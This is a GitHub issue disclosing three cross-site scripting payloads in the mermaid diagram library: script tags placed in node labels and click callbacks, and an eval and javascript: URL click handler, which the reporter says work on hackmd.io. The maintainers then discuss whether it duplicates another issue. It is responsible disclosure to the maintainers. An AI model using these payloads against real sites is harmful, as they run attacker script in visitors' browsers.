Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

cross site scripting in mermaid #869

Closed
5alt opened this issue Jul 3, 2019 · 3 comments

Comments

@5alt
Copy link

commented Jul 3, 2019

Hi, I found XSS issues in mermaid. This affects all the projects that use mermaid.

There are three different ways to trigger.

The first one:

graph TD
B --> C{<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>}

The second one:

graph LR;
    A-->B;
    click B callback "<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>"

The third one(needs click, both nodes will work):

graph LR;
    alert`md5_salt`-->B;
    click alert`md5_salt` eval "Tooltip for a callback"
    click B "javascript:alert`salt`" "This is a tooltip for a link"

Here is an example that affects other projects which using mermaid.
hackmdio/codimd#1233

And all above three payload would work on hackmd.io

Hope you can fix soon!

@knsv

This comment has been minimized.

Copy link
Owner

commented Jul 5, 2019

Hi, I think this is a duplicate of #847. I will close this one. I will move your example there. If you disagree of the overlap reopen with a comment.

@5alt

This comment has been minimized.

Copy link
Author

commented Jul 5, 2019

Hi,
#847 is only the 1st case in this issue, and there are three cases in this issue.

I don't think your fix of #847 will apply for the last case.

@ThePenguin1140

This comment has been minimized.

Copy link
Collaborator

commented Jul 6, 2019

We should extend the scope of #847 then.
@knsv has added your example to the issue so please watch it for any relevant updates. I will close this issue for now.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.